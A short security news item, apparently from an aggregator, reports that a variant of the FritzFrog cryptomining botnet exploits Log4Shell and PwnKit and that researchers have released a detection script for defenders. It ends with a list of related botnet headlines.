Security News > 2024 > February > FritzFrog botnet exploits Log4Shell, PwnKit vulnerabilities
The FritzFrog cryptomining botnet has new potential for growth: a recently analyzed variant of the bot is exploiting the Log4Shell and PwnKit vulnerabilities for lateral movement and privilege escalation.
The FritzFrog botnet, initially identified in August 2020, is a peer-to-peer botnet powered by malware written in Golang.
"FritzFrog identifies potential Log4Shell targets by looking for HTTP servers over ports 8080, 8090, 8888 and 9000. To trigger the vulnerability, an attacker needs to force the vulnerable log4j application to log data containing a payload," security researcher Ori David explained.
"FritzFrog sends the Log4Shell payload in numerous HTTP headers, hoping that at least one of them gets logged by the application. This brute force exploitation approach aims to be a generic Log4Shell exploit that can affect a wide variety of applications."
Finally, FritzFrog manages to evade detection by making sure not to drop files on the disk whenever possible.
The researchers have provided a detection script enterprise defenders can use to check their SSH servers for indicators of a FritzFrog infection.
News URL
https://www.helpnetsecurity.com/2024/02/01/botnet-log4shell-pwnkit/
Related news
- New botnet exploits vulnerabilities in NVRs, TP-Link routers (source)
- FICORA and Kaiten Botnets Exploit Old D-Link Vulnerabilities for Global Attacks (source)
- Malware botnets exploit outdated D-Link routers in recent attacks (source)
- New Mirai botnet targets industrial routers with zero-day exploits (source)
- Mirai Botnet Variant Exploits Four-Faith Router Vulnerability for DDoS Attacks (source)
- Hackers Exploit Zero-Day in cnPilot Routers to Deploy AIRASHI DDoS Botnet (source)
- New Aquabot Botnet Exploits CVE-2024-41710 in Mitel Phones for DDoS Attacks (source)